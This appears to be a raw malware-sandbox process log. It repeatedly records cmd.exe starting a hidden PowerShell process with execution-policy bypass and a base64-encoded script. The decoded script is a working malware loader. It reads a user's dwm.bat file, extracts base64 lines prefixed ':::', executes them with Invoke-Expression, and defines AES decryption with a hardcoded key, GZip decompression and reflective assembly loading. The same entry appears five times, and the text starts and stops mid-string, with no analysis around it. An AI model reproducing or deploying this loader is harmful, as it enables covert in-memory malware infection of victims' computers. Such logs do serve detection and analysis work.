hci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
